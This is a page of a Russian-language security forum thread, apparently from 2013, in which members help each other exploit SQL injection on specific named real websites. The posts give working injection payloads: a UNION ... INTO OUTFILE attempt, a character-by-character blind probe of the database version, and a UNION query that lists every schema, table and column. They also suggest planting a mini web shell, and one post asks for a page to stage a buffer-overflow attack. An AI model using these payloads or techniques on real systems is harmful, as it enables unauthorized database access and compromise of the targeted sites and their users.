HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2231 из 2422 « Первая < 12311731213121812221 2227 2228 2229 2230 2231 2232 2233 2234 2235 224122812331 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.07.2013, 20:24
Shelling
Новичок
Регистрация: 15.03.2013
Сообщений: 0
Провел на форуме:
0

Репутация: -5
По умолчанию
в хост писать имя сайта но не всегда мускул находиться на том же сервере на пример на мастрехосте это другой сервер по этому лучше прочитайте конфиг какойнибудь если найдёте
 
Ответить с цитированием

  #2  
Старый 29.07.2013, 03:13
exstreme
Новичок
Регистрация: 23.02.2013
Сообщений: 14
Провел на форуме:
3581

Репутация: 0
По умолчанию
привет всем

есть SQL Inject, помогите раскрутить.

Код:
GET /junior/88/matches/stage/SQLInject/ HTTP/1.1
Referer: http://allhockey.ru:80/
На сайте фильтруются пробелы,все что пока получилось

Код:
/junior/88/matches/stage/'-1'UNION(SELECT(null),'test',3,4,(INTO(OUTFILE)'test.html))/
Подправьте, что не так или посоветуйте другие варианты
 
Ответить с цитированием

  #3  
Старый 29.07.2013, 19:55
n3m1s
Новичок
Регистрация: 28.07.2013
Сообщений: 20
Провел на форуме:
4326

Репутация: 5
По умолчанию
Каким образом можно создать площадку для проведения атаки на буфер обмена?

Нужна именно страница с таким кодом (на PHP), чтобы при запросе с определённым значением происходило переполнение буфера, вследствии чего появлялась ошибка (403, 228 etc.).

Проверка входящего запроса на наличие значение не пойдёт.
 
Ответить с цитированием

  #4  
Старый 29.07.2013, 21:50
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
Провел на форуме:
94006

Репутация: 24
По умолчанию
сайт.com/index.php?hl=ru&idd=cat&cat='

Добавив в конце кавычку выдало следующую ошибку:

Код:
Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9
Или всё-таки должно выдать You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''
 
Ответить с цитированием

  #5  
Старый 29.07.2013, 21:57
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349

Репутация: 45
По умолчанию
Цитата:
Сообщение от Unknowhacker  
сайт.com/index.php?hl=ru&idd=cat&cat=
'
Добавив в конце кавычку выдало следующую ошибку:
Код:
Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9
Или всё-таки должно выдать
You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''
Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.

1,2) or 1=1 order by 10000 -- w - что выдаст ?
 
Ответить с цитированием

  #6  
Старый 29.07.2013, 23:25
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
Провел на форуме:
94006

Репутация: 24
По умолчанию
Цитата:
Сообщение от Inoms  
Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.
1,2) or 1=1 order by 10000 -- w - что выдаст ?
Ничего. Фильтрует

Код:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27
 
Ответить с цитированием

  #7  
Старый 30.07.2013, 00:49
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349

Репутация: 45
По умолчанию
Цитата:
Сообщение от Unknowhacker  
Ничего. Фильтрует
Код:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27
Это слепая sql.

Её бессмысленно крутить, только по-символьно вытаскивать данные -

http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=1%29%20or%201=1%20and% 20substring%28%28version%28%29%29,1,1%29=5%20%23w

Если что-то равно чему-то, в данном случае, первый символ версии субд=5 - выведет каталог), если нет - пустоту.

Или при лучших обстоятельствах сделать вывод мини-шелла в диру с сайтом при соответствующих привилегиях и правах.
 
Ответить с цитированием

  #8  
Старый 30.07.2013, 00:55
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от Unknowhacker  
Ничего. Фильтрует
Код:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27
Так еще можно сделать

http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1 ,2,3,(select(@x)from(select(@x:=0x00),(select(null )from(information_schema.columns)where(table_schem a!=0x696e666f726d6174696f6e5f736368656d61)and(0x00 )in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name))))x),5,6,7,8,9,10,11,12, 13,14,15,16+--+
 
Ответить с цитированием

  #9  
Старый 30.07.2013, 01:49
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
Провел на форуме:
94006

Репутация: 24
По умолчанию
Цитата:
Сообщение от er9j6@  
Так еще можно сделать
http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1 ,2,3,(select(@x)from(select(@x:=0x00),(select(null )from(information_schema.columns)where(table_schem a!=0x696e666f726d6174696f6e5f736368656d61)and(0x00 )in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name))))x),5,6,7,8,9,10,11,12, 13,14,15,16+--+
Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..

P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает
 
Ответить с цитированием

  #10  
Старый 30.07.2013, 06:48
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418

Репутация: 652


По умолчанию
Цитата:
Сообщение от Unknowhacker  
Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..
P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает
Бессмысленности здесь нет!

er9j6@ привел способ вывода данных в формате

Цитата:
Сообщение от None  
table_schema table_name column _name
через принтабельное поле.

p.s. уберите лишние пробелы
 
Ответить с цитированием
Ответ
Страница 2231 из 2422 « Первая < 12311731213121812221 2227 2228 2229 2230 2231 2232 2233 2234 2235 224122812331 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.